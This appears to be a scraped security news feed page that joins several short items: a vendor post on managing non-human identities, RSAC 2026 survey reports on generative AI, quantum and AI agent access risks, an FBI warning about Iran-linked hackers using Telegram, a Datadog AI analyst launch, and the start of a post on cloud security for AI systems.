addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.praetorian.com/blog/">Offensive Security Blog: Latest Trends in Hacking | Praetorian</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by n8n-publisher">n8n-publisher</a>. Read the original post at: <a href="https://www.praetorian.com/blog/azure-apim-signup-bypass/">https://www.praetorian.com/blog/azure-apim-signup-bypass/</a> </p>

<h2>Are You Overlooking the Crucial Role of Non-Human Identities in Access Management?</h2><p>Managing Non-Human Identities (NHIs) is no longer a luxury but a necessity for robust cybersecurity. These NHIs represent machine identities, pivotal in maintaining the security protocols inherent in automated systems. The growing reliance on technology across industries necessitates an understanding of their importance. But how exactly do NHIs manage access, and why should your organization care?</p><h3>Understanding the Essence of Non-Human Identities</h3><p>The concept of Non-Human Identities revolves around machine identities created by fusing a “Secret”—an encrypted password, token, or key—and the permissions granted by destination servers. Think of it as combining a tourist and their passport; the identity is the tourist, while the secret serves as the passport enabling access to different systems.</p><p>NHIs become crucial in environments relying heavily on automation, particularly in sectors like financial services, healthcare, travel, and DevOps. Where we increasingly transition to cloud-centric operations, the demand for effective NHI management escalates. The absence of such oversight can forge significant security gaps.</p><h3>Bridging the Gap: Security and R&amp;D Teams</h3><p>One of the perennial challenges faced by organizations is the disconnect between security and Research &amp; Development (R&amp;D) teams. This gap often leads to vulnerabilities that are easily exploitable by malicious entities. The comprehensive management of NHIs offers a cohesive strategy, facilitating a seamless and secure cloud environment. By ensuring end-to-end protection, NHIs help bridge these gaps effectively.</p><h3>Lifecycle Management in NHI</h3><p>Effective NHI management involves paying meticulous attention to every stage of their lifecycle, from discovery and classification to threat detection and remediation. Such an approach contrasts significantly with point solutions like secret scanners, which offer a narrow field of protection.</p><ul> <li><strong>Discovery and Classification:</strong> Identifying and categorizing NHIs is the foundational step in establishing secure systems.</li> <li><strong>Threat Detection:</strong> Monitoring the NHIs’ behaviors within systems is crucial for detecting any anomalies or potential threats to security.</li> <li><strong>Remediation:</strong> Prompt actions based on identified threats help mitigate risks efficiently.</li> </ul><p>Understanding the entire lifecycle facilitates a context-aware security practice, offering insights into ownership, permissions, usage patterns, and potential vulnerabilities.</p><h3>Benefits of Implementing NHI Management</h3><p>Organizations committed to NHI management experience several significant advantages:</p><ul> <li><strong>Reduced Risk:</strong> Proactively mitigating security threats decreases the likelihood of breaches and data leaks.</li> <li><strong>Improved Compliance:</strong> By meeting regulatory requirements through policy enforcement and audit trails, businesses adhere to necessary compliance standards.</li> <li><strong>Increased Efficiency:</strong> Automating NHIs and secrets management allows security teams to concentrate on strategic initiatives.</li> <li><strong>Enhanced Visibility and Control:</strong> A centralized view for access management and governance empowers organizations with better security oversight.</li> <li><strong>Cost Savings:</strong> Automating secrets rotation and decommissioning NHIs significantly reduces operational costs.</li> </ul><h3>Insights into Industry Relevance</h3><p>Given the diverse range of industries relying on cloud technology, from healthcare to travel, the relevance of NHI management cannot be overstated. For DevOps and Security Operations Center (SOC) teams, efficient NHI management optimizes operations and safeguards against potential threats. Such practices translate into not just compliance and security but also a dependable operational framework that withstands the test of time.</p><p>For more on how <a href="https://entro.security/blog/harnessing-ai-in-ima-and-am/">harnessing AI in Identity and Access Management (IAM) and Access Management (AM)</a> can complement NHI management, explore strategies that lead to a more secure cyber.</p><h3>Building a Secure Cloud Environment</h3><p>The cloud has become the backbone of modern operations, transforming how businesses innovate and serve their clients. However, this transition demands a renewed focus on security. NHIs play a pivotal role, addressing prevalent security gaps and facilitating a secure cloud environment. This aligns with <a href="https://entro.security/blog/just-in-time-access-role-in-non-human-identities-access-management/">Just-in-Time access in Non-Human Identities access management </a> to ensure timely and secured permissions.</p><p>The strategic significance of NHIs becomes evident when they help manage machine identities crucial to better cybersecurity measures. Interested in a deeper dive on how this strategic approach aligns with zero trust principles? See the discussion on <a href="https://entro.security/blog/the-role-of-secrets-management-in-zero-trust-architecture/">the role of secrets management in Zero Trust Architecture</a>.</p><p>By taking a holistic view of NHI management, organizations not only protect their systems but also create an agile infrastructure capable of adapting to evolving threats. This approach represents a forward-thinking paradigm, empowering businesses to navigate the complexities of cybersecurity with confidence.</p><h3>Why Are Non-Human Identities Essential for Cloud Security?</h3><p>Have you ever considered how cloud security would function without proper oversight of Non-Human Identities (NHIs)? When organizations shift more of their operations to the cloud, they encounter an equally significant shift in focus towards safeguarding these machine identities. NHIs include encrypted passwords, tokens, and keys that effectively act as digital signatures, allowing machines to communicate securely and efficiently. When managed correctly, they provide a robust line of defense against unauthorized access and potential breaches.</p><p>Mismanagement or neglect of NHIs can severely compromise security, expose sensitive data, and even bring operations to a standstill. Ineffective NHI management has consequences that ripple through every level of an enterprise’s architecture, highlighting the essential role these identities play in digital. These challenges elevate the importance of adopting a comprehensive approach to NHI management where organizations fortify their cloud-based operations.</p><h3>Real-world Implications and Industry Challenges</h3><p>In industries like financial services and healthcare, where sensitive data is abundant, the proper management of NHIs is crucial. These sectors routinely handle large volumes of sensitive information, from financial transactions to personal health records, making them prime targets for cyberattacks. In these fields, an improperly managed machine identity can open the door to devastating breaches.</p><p>Across various industries—such as travel, DevOps, and SOC teams—the common thread of concern points to automating processes while maintaining security. Cloud technology brings unprecedented scalability and operational efficiency, but it also creates unique challenges. Companies need to integrate NHI management as a cornerstone of their cybersecurity strategy, balancing this advancement with stringent security measures.</p><h3>Understanding Technical</h3><p>Is your organization keeping pace with the latest advancements in NHI management? Behavioral analytics and machine learning, for instance, play a vital role in enhancing NHI oversight. These technologies help create advanced systems that predict and alert to abnormal behavior based on historic data patterns. Such sophistication supports a proactive security posture, catching potential threats before they manifest into full-fledged attacks.</p><p>Moreover, implementing multi-factor authentication (MFA) for machines, much like humans, adds an extra layer of security. MFA ensures that even if a machine’s “passport” or identity gets compromised, unauthorized entities cannot easily exploit system access. For insights on implementing these protocols, explore the detailed guidelines outlined in <a href="https://entro.security/blog/implementing-nhi-security-protocols/">Implementing NHI Security Protocols</a>.</p><h3>Automation: The Double-Edged Sword</h3><p>While automation contributes to efficiency and scalability, it inherently carries risks if not meticulously managed. Automating the lifecycle of NHIs—ensuring timely updates, permissions adjustments, and decommissioning—reduces the chances of security lapses. Yet, the failure to update and rotate secrets promptly could lead to vulnerabilities. This emphasizes the importance of comprehensive automation strategies to mitigate risk, as highlighted in <a href="https://entro.security/blog/how-cisos-should-prepare-for-2025/">how CISOs should prepare for 2025</a>.</p><p>Meanwhile, those involved in DevOps face parallel challenges. The speed and agility provided by DevOps necessitate machine identities to seamlessly interconnect various components within cloud infrastructure. NHI management must therefore align with DevOps methodologies, ensuring that systems are both agile and secure.</p><h3>Segmentation and Access Control</h3><p>A robust NHI management strategy necessitates precise segmentation and access control. Segmenting machine identities helps compartmentalize access and limits the scope of potential breaches. With NHIs communicate between applications, databases, and scripts, defining access parameters based on roles ensures that machines execute only what they are permitted to, preventing overreach and misuse.</p><p>In developing these frameworks, organizations gain enhanced oversight into machine communications and workflows. Such insights aid in identifying and sealing security loopholes, creating fortified, yet flexible, security postures.</p><h3>New with Artificial Intelligence</h3><p>Are you leveraging AI to optimize NHI management in your organization? Artificial intelligence introduces new managing NHIs by automating the detection of threat anomalies and proposing remediation actions. AI’s predictive modeling capabilities offer insights into access behaviors and patterns, helping refine security procedures. For more information on integrating AI into Identity Access Management, explore <a href="https://entro.security/blog/non-human-identity-security-in-saas/">Non-Human Identity Security in SaaS</a>.</p><p>Integrating AI into managing machine identities ensures a dynamic response to emerging threats, enhancing the ability to neutralize them swiftly. This merging of AI with NHI systems represents a pivotal evolution in cybersecurity dynamics.</p><p>In summary, with digital become progressively complex, Non-Human Identites and secrets management remains a pivotal component. Building and maintaining a secure cloud environment requires a concerted focus on managing these machine identities at each stage of their lifecycle. By aligning various departmental security policies and leveraging technological advancements like AI, progressive organizations will ensure robust and enduring protection across their cloud environments. With these strategies in place, businesses can boost their resilience against escalating cybersecurity threats and drive innovation, knowing their core operations remain secure.</p><p>The post <a href="https://entro.security/how-do-non-human-identities-manage-access/">How do Non-Human Identities manage access?</a> appeared first on <a href="https://entro.security/">Entro</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/how-do-non-human-identities-manage-access/" data-a2a-title="How do Non-Human Identities manage access?"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-do-non-human-identities-manage-access%2F&amp;linkname=How%20do%20Non-Human%20Identities%20manage%20access%3F" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-do-non-human-identities-manage-access%2F&amp;linkname=How%20do%20Non-Human%20Identities%20manage%20access%3F" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-do-non-human-identities-manage-access%2F&amp;linkname=How%20do%20Non-Human%20Identities%20manage%20access%3F" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-do-non-human-identities-manage-access%2F&amp;linkname=How%20do%20Non-Human%20Identities%20manage%20access%3F" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-do-non-human-identities-manage-access%2F&amp;linkname=How%20do%20Non-Human%20Identities%20manage%20access%3F" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://entro.security/">Entro</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Alison Mack">Alison Mack</a>. Read the original post at: <a href="https://entro.security/how-do-non-human-identities-manage-access/">https://entro.security/how-do-non-human-identities-manage-access/</a> </p>

Let's imagine a customer-support chatbotit's running on Red Hat OpenShift AI and searches internal documents to answer questions. A user asks it a common question, but the chatbot inadvertently retri… [+13664 chars]

<p>Companies know they have a problem with generative AI and quantum security. They just haven’t done much about it yet.</p><p>That’s the upshot of Utimaco’s 2026 Digital Trust Report, a commissioned study of 250 large U.S. companies released at RSAC 2026. The research, conducted by 451 Research from S&amp;P Global, exposes a stark gap between awareness and action across both AI and quantum security.</p><p>On the AI side, 78% of respondents said data breaches are the greatest risk associated with generative AI that must be addressed in the next 12 months. Close behind: 77% flagged intellectual property theft as a top concern. Yet more than half (57%) have not yet implemented any countermeasures. Over 90% say AI is used in daily production operations, and nearly two-thirds report running hybrid IT infrastructure with strategic public cloud workloads. So the exposure is real and widespread; the response is not.</p><p>The quantum findings are even more striking. Seventy-two percent of respondents identified attacks on legacy data as the biggest quantum security risk, pointing specifically to “harvest now, decrypt later” (HNDL) attacks, where adversaries collect encrypted data today with the intent to decrypt it once quantum computing matures. Despite that recognition, 75% have not implemented a corresponding solution. Only 23% have deployed anything to address HNDL.</p><p>Data sovereignty rounded out the findings. Eighty percent of respondents rated protecting customer data as “very” or “critically” important, even as the U.S. lacks a national privacy law equivalent to GDPR. The report notes that sovereignty has become a genuinely global concern regardless of local regulatory requirements.</p><p>“Given the new risks posed by technologies such as AI and quantum computing, data protection and data security require strategic measures,” said Tina Stewart, CMO at Utimaco. “Developing a long-term encryption strategy provides the necessary flexibility to address current data protection threats to AI and future risks posed by quantum computing.”</p><p>451 Research analyst Justin Lam put it plainly: “The tension between enterprise risk and readiness is real.”</p><p>Utimaco makes hardware security modules and key management solutions for on-premises and cloud environments. The full 2026 Digital Trust Report is available for download from Utimaco’s website.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/utimaco-survey-78-of-us-companies-say-data-breaches-are-the-top-genai-risk-but-most-havent-acted/" data-a2a-title="Utimaco Survey: 78% of US Companies Say Data Breaches Are the Top GenAI Risk, But Most Haven’t Acted"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Futimaco-survey-78-of-us-companies-say-data-breaches-are-the-top-genai-risk-but-most-havent-acted%2F&amp;linkname=Utimaco%20Survey%3A%2078%25%20of%20US%20Companies%20Say%20Data%20Breaches%20Are%20the%20Top%20GenAI%20Risk%2C%20But%20Most%20Haven%E2%80%99t%20Acted" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Futimaco-survey-78-of-us-companies-say-data-breaches-are-the-top-genai-risk-but-most-havent-acted%2F&amp;linkname=Utimaco%20Survey%3A%2078%25%20of%20US%20Companies%20Say%20Data%20Breaches%20Are%20the%20Top%20GenAI%20Risk%2C%20But%20Most%20Haven%E2%80%99t%20Acted" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Futimaco-survey-78-of-us-companies-say-data-breaches-are-the-top-genai-risk-but-most-havent-acted%2F&amp;linkname=Utimaco%20Survey%3A%2078%25%20of%20US%20Companies%20Say%20Data%20Breaches%20Are%20the%20Top%20GenAI%20Risk%2C%20But%20Most%20Haven%E2%80%99t%20Acted" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Futimaco-survey-78-of-us-companies-say-data-breaches-are-the-top-genai-risk-but-most-havent-acted%2F&amp;linkname=Utimaco%20Survey%3A%2078%25%20of%20US%20Companies%20Say%20Data%20Breaches%20Are%20the%20Top%20GenAI%20Risk%2C%20But%20Most%20Haven%E2%80%99t%20Acted" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Futimaco-survey-78-of-us-companies-say-data-breaches-are-the-top-genai-risk-but-most-havent-acted%2F&amp;linkname=Utimaco%20Survey%3A%2078%25%20of%20US%20Companies%20Say%20Data%20Breaches%20Are%20the%20Top%20GenAI%20Risk%2C%20But%20Most%20Haven%E2%80%99t%20Acted" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>

<p>AI agents are already deployed broadly across enterprise environments. The problem is that organizations can’t tell what they’re doing.</p><p>That’s the core finding of a new survey report released at RSAC 2026 by the Cloud Security Alliance, commissioned by Aembit. The “Identity and Access Gaps in the Age of Autonomous AI” report surveyed 228 IT and security professionals in January 2026 and found that identity governance for AI agents is, in most organizations, essentially improvised.</p><p>The headline number: 68% of organizations cannot clearly distinguish between human and AI agent activity, even as 73% expect AI agents to become vital to their operations within the next year. Eighty-five percent say AI agents are already running in production environments, across task automation (67%), research (52%), developer assistance (50%), and security monitoring (50%). In other words, these agents are doing real work inside real systems with real access, and most organizations lack the controls to attribute their actions.</p><p>The identity situation is particularly fragmented. Fifty-two percent of organizations use workload identities for agents, 43% rely on shared service accounts, and 31% allow agents to operate under human user identities. Nearly three-quarters (74%) say agents often receive more access than necessary. Seventy-nine percent believe agents create new access pathways that are difficult to monitor. Only 22% report that access frameworks are applied “very consistently” to AI agents.</p><p>Ownership is scattered too: 28% say security leads responsibility, followed by development and engineering (21%) and IT (19%). Only 9% point to IAM teams.</p><p>“AI agents are inheriting human permissions, operating under shared accounts, and expanding the attack surface in ways that existing IAM tools weren’t designed to handle,” said David Goldschlag, co-founder and CEO of Aembit. “Agentic autonomy without identity-level access controls is a risk organizations can’t afford to ignore.”</p><p>Hillary Baron, AVP of Research at CSA, added that existing IAM approaches “were not designed for autonomous agents and are showing strain as deployments scale.”</p><p>The full report is available from the Cloud Security Alliance. Aembit is a non-human identity and access management platform backed by $45 million in total funding.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/csa-and-aembit-survey-68-of-organizations-cant-distinguish-ai-agent-actions-from-human-activity/" data-a2a-title="CSA and Aembit Survey: 68% of Organizations Can’t Distinguish AI Agent Actions from Human Activity"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcsa-and-aembit-survey-68-of-organizations-cant-distinguish-ai-agent-actions-from-human-activity%2F&amp;linkname=CSA%20and%20Aembit%20Survey%3A%2068%25%20of%20Organizations%20Can%E2%80%99t%20Distinguish%20AI%20Agent%20Actions%20from%20Human%20Activity" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcsa-and-aembit-survey-68-of-organizations-cant-distinguish-ai-agent-actions-from-human-activity%2F&amp;linkname=CSA%20and%20Aembit%20Survey%3A%2068%25%20of%20Organizations%20Can%E2%80%99t%20Distinguish%20AI%20Agent%20Actions%20from%20Human%20Activity" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcsa-and-aembit-survey-68-of-organizations-cant-distinguish-ai-agent-actions-from-human-activity%2F&amp;linkname=CSA%20and%20Aembit%20Survey%3A%2068%25%20of%20Organizations%20Can%E2%80%99t%20Distinguish%20AI%20Agent%20Actions%20from%20Human%20Activity" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcsa-and-aembit-survey-68-of-organizations-cant-distinguish-ai-agent-actions-from-human-activity%2F&amp;linkname=CSA%20and%20Aembit%20Survey%3A%2068%25%20of%20Organizations%20Can%E2%80%99t%20Distinguish%20AI%20Agent%20Actions%20from%20Human%20Activity" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcsa-and-aembit-survey-68-of-organizations-cant-distinguish-ai-agent-actions-from-human-activity%2F&amp;linkname=CSA%20and%20Aembit%20Survey%3A%2068%25%20of%20Organizations%20Can%E2%80%99t%20Distinguish%20AI%20Agent%20Actions%20from%20Human%20Activity" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>

In a previous post on language modeling, I implemented a GPT-style transformer. Lately Ive been learning mechanistic interpretability to go deeper and understand why the transformer works on a mathem… [+20487 chars]

<h2><b>What happened</b></h2><p class="p3">The <span class="s2">FBI</span> issued a warning that Iran-linked hackers tied to the country’s <span class="s2">Ministry of Intelligence and Security (MOIS)</span> are using <span class="s2">Telegram</span> as command-and-control infrastructure in malware campaigns. The activity has been attributed to the <span class="s2">Handala</span> hacktivist group and related state-linked actors, who are targeting journalists, dissidents, and opposition groups worldwide. According to the alert, attackers rely on social engineering to infect victims with <span class="s2">Windows-based malware</span>, which is then used to exfiltrate files and screenshots from compromised systems. The FBI said the campaigns are part of broader “hack-and-leak” operations aimed at intelligence collection and reputational damage amid heightened geopolitical tensions.<span class="Apple-converted-space">  </span></p><h2><b>Who is affected</b></h2><p class="p3">Journalists, political dissidents, and individuals critical of the Iranian government are primarily affected, along with organizations and individuals globally who may be targeted through similar malware delivery tactics.<span class="Apple-converted-space">  </span></p><h2><b>Why CISOs should care</b></h2><p class="p3">The campaign shows how attackers are increasingly leveraging widely used messaging platforms like Telegram as covert infrastructure for malware operations, blending social engineering with command-and-control activity.<span class="Apple-converted-space">  </span></p><h2><b>3 practical actions</b></h2><ol> <li class="p3"><span class="s2"><b>Monitor messaging platforms for abuse.</b></span> Watch for suspicious links, files, or communications originating from Telegram-based channels.<span class="Apple-converted-space">  </span></li> <li class="p3"><span class="s2"><b>Harden defenses against social engineering.</b></span> The attacks rely on tricking users into executing malware rather than exploiting software flaws.<span class="Apple-converted-space">  </span></li> <li class="p3"><span class="s2"><b>Detect data exfiltration behavior.</b></span> Monitor for unusual file transfers or screenshot capture activity on endpoints.<span class="Apple-converted-space">  </span></li> </ol><p class="p3"><i>For more coverage of large-scale incidents and threat activity, explore our reporting on </i><a href="https://cisowhisperer.com/tag/cyberattack/"><span class="s2"><b><i>Cyberattacks</i></b></span></a><i>.</i></p><p>The post <a rel="nofollow" href="https://cisowhisperer.com/fbi-warns-of-handala-hackers-using-telegram-in-malware-attacks/">FBI Warns of Handala Hackers Using Telegram in Malware Attacks</a> appeared first on <a rel="nofollow" href="https://cisowhisperer.com/">CISO Whisperer</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/fbi-warns-of-handala-hackers-using-telegram-in-malware-attacks/" data-a2a-title="FBI Warns of Handala Hackers Using Telegram in Malware Attacks"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Ffbi-warns-of-handala-hackers-using-telegram-in-malware-attacks%2F&amp;linkname=FBI%20Warns%20of%20Handala%20Hackers%20Using%20Telegram%20in%20Malware%20Attacks" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Ffbi-warns-of-handala-hackers-using-telegram-in-malware-attacks%2F&amp;linkname=FBI%20Warns%20of%20Handala%20Hackers%20Using%20Telegram%20in%20Malware%20Attacks" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Ffbi-warns-of-handala-hackers-using-telegram-in-malware-attacks%2F&amp;linkname=FBI%20Warns%20of%20Handala%20Hackers%20Using%20Telegram%20in%20Malware%20Attacks" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Ffbi-warns-of-handala-hackers-using-telegram-in-malware-attacks%2F&amp;linkname=FBI%20Warns%20of%20Handala%20Hackers%20Using%20Telegram%20in%20Malware%20Attacks" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Ffbi-warns-of-handala-hackers-using-telegram-in-malware-attacks%2F&amp;linkname=FBI%20Warns%20of%20Handala%20Hackers%20Using%20Telegram%20in%20Malware%20Attacks" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://cisowhisperer.com">CISO Whisperer</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Evan Rowe">Evan Rowe</a>. Read the original post at: <a href="https://cisowhisperer.com/fbi-warns-of-handala-hackers-using-telegram-in-malware-attacks/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=fbi-warns-of-handala-hackers-using-telegram-in-malware-attacks">https://cisowhisperer.com/fbi-warns-of-handala-hackers-using-telegram-in-malware-attacks/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=fbi-warns-of-handala-hackers-using-telegram-in-malware-attacks</a> </p>

<p>SAN FRANCISCO – Datadog Inc. on Monday <a href="https://www.globenewswire.com/news-release/2026/03/23/3260461/0/en/Bits-AI-Security-Analyst-Reduces-Threat-Investigation-Time-by-up-to-98.html">announced</a> general availability of its Bits AI Security Analyst, a move designed to transform how security teams handle the overwhelming surge of digital threats.</p><p>Integrated directly into Datadog’s Cloud SIEM (Security Information and Event Management), the new AI agent aims to solve a critical bottleneck in the Security Operations Center (SOC). By autonomously investigating alerts, Bits AI can reportedly condense complex investigations that traditionally take human analysts hours into as little as 30 seconds.</p><p>Modern security teams are currently caught in a pincer movement: a global talent shortage on one side, and the rise of agentic-powered AI attacks on the other. According to Datadog, the sheer volume of data makes it nearly impossible for human teams to triage every threat manually.</p><p>“Traditional SIEMs are leaving enterprises increasingly exposed because queues keep growing and investigations take longer to correlate,” said Tim Knudsen, vice president of security products at Datadog. He noted that Bits AI leverages observability signals to provide “fully explained verdicts,” allowing human teams to focus on high-impact defense rather than manual data sorting.</p><p>Datadog claims that Bits AI functions as an “always-on senior SOC analyst,” offering several operational advantages: rapid resolution, which reduces the mean-time-to-resolution (MTTR) by more than 90%; unified visibility, which aggregates data across clouds, identities, and endpoint detection and Response (EDR) systems; and enterprise scaling, built-in security controls like Role-Based Access Control (RBAC) ensure the AI operates within corporate governance frameworks.</p><p>The launch at RSAC 2026 here signals a shift toward autonomous security operations. As GenAI attacks intensify, Datadog Chief Product Officer Yanbing Li emphasized that “intelligent, autonomous systems” are no longer optional for Fortune 500 companies.</p><p>Bits AI Security Analyst is available to all Datadog customers.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/datadog-launches-ai-security-agent-to-combat-machine-speed-cyberattacks/" data-a2a-title="Datadog Launches AI Security Agent to Combat Machine-Speed Cyberattacks"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fdatadog-launches-ai-security-agent-to-combat-machine-speed-cyberattacks%2F&amp;linkname=Datadog%20Launches%20AI%20Security%20Agent%20to%20Combat%20Machine-Speed%20Cyberattacks" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fdatadog-launches-ai-security-agent-to-combat-machine-speed-cyberattacks%2F&amp;linkname=Datadog%20Launches%20AI%20Security%20Agent%20to%20Combat%20Machine-Speed%20Cyberattacks" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fdatadog-launches-ai-security-agent-to-combat-machine-speed-cyberattacks%2F&amp;linkname=Datadog%20Launches%20AI%20Security%20Agent%20to%20Combat%20Machine-Speed%20Cyberattacks" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fdatadog-launches-ai-security-agent-to-combat-machine-speed-cyberattacks%2F&amp;linkname=Datadog%20Launches%20AI%20Security%20Agent%20to%20Combat%20Machine-Speed%20Cyberattacks" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fdatadog-launches-ai-security-agent-to-combat-machine-speed-cyberattacks%2F&amp;linkname=Datadog%20Launches%20AI%20Security%20Agent%20to%20Combat%20Machine-Speed%20Cyberattacks" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>

<h2>The Evolution of the 4 C's in the AI Era</h2><p>Honestly, the old "4 C's" of cloud security—Cloud, Cluster, Container, and Code—feel like they're from a different century now that we're all obsessed with ai. It's funny because we spent years perfecting those layers, and then large language models showed up and basically broke the mental model.</p><p>The problem is that traditional security treats data like a static object sitting in a database, but in an ai-driven setup, data is constantly flowing through "context windows." It's not just about protecting the container anymore; it's about what the model is actually doing with the information it grabs. Standard cloud security doesn't really care about "model context," which is a huge blind spot. </p><p>When you have an ai agent in a healthcare setting pulling patient records to summarize a chart, the security risk isn't just a leaked api key—it's the agent getting "hallucinations" or being manipulated by a prompt injection. </p><ul> <li><strong>Static vs. Dynamic:</strong> Old workloads stayed put. New ai agents are basically digital employees that can browse the web, read your emails, and execute code on the fly.</li> <li><strong>The Context Gap:</strong> If a retail bot has access to your inventory but gets tricked into giving a 99% discount, your firewall isn't going to save you.</li> <li><strong>Enter MCP:</strong> We're seeing a shift toward the <strong>Model Context Protocol (mcp)</strong>. To put it simply, mcp is an open standard that lets developers build secure, two-way connections between data sources and ai models. It's a way to standardize how these models talk to data securely, so we aren't just winging it with custom integrations.</li> </ul><p><img decoding="async" 